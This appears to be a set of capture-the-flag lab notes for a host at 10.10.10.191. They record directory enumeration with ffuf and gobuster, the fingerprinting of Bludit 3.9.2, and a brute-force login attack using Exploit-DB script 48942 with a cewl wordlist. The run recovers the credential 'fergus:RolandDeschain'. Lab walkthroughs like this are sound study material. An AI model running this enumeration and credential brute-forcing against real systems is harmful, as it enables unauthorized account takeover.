2 :80

ffuf
cgi-bin/                [Status: 301, Size: 0, Words: 1, Lines: 1]
LICENSE                 [Status: 200, Size: 1083, Words: 155, Lines: 22]
robots.txt              [Status: 200, Size: 22, Words: 3, Lines: 2]
server-status           [Status: 403, Size: 277, Words: 20, Lines: 10]

$ gobuster dir -u 10.10.10.191 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -x php,txt,html
===============================================================
2021/06/16 12:05:30 Starting gobuster in directory enumeration mode
===============================================================
/about                (Status: 200) [Size: 3281]
/0                    (Status: 200) [Size: 7562]
/admin                (Status: 301) [Size: 0] [--> http://10.10.10.191/admin/]
/install.php          (Status: 200) [Size: 30]
/todo.txt             (Status: 200) [Size: 118]
/usb                  (Status: 200) [Size: 3960]


http://10.10.10.191/todo.txt
-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING

$ gobuster dir -u http://10.10.10.191 -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt -t 100
/.gitignore          (Status: 200) [Size: 563]

http://10.10.10.191/robots.txt
User-agent: *
Allow: /


http://10.10.10.191/install.php
Bludit is already installed ;)

http://10.10.10.191/admin/
Login page Bludit

http://10.10.10.191/.gitignore
.DS_Store
dbgenerator.php
bl-content/*
bl-content-migrator
bl-plugins/timemachine
bl-plugins/timemachine-x
bl-plugins/discovery
bl-plugins/updater
bl-plugins/medium-editor
bl-plugins/quill
bl-plugins/yandex-metrica/
bl-plugins/domain-migrator/
bl-plugins/tail-writer/
bl-kernel/bludit.pro.php
bl-kernel/admin/themes/gris
bl-themes/docs
bl-themes/docsx
bl-themes/editorial
bl-themes/mediumish
bl-themes/clean-blog
bl-themes/grayscale
bl-themes/massively
bl-themes/hyperspace
bl-themes/striped
bl-themes/log
bl-themes/micro
bl-themes/tagg
bl-themes/future-imperfect

Found Bludit Version
<!-- Include Bootstrap CSS file bootstrap.css -->
<link rel="stylesheet" type="text/css" href="http://10.10.10.191/bl-kernel/css/bootstrap.min.css?version=3.9.2">

Using https://www.exploit-db.com/exploits/48942
$ echo "fergus" > user.txt
$ cewl http://10.10.10.191 -w pass.txt

$ python3 48942.py -l http://10.10.10.191/admin/login.php -u user.txt -p pass.txt
[*] SUCCESS !!
[+] Use Credential -> fergus:RolandDeschain

Last updated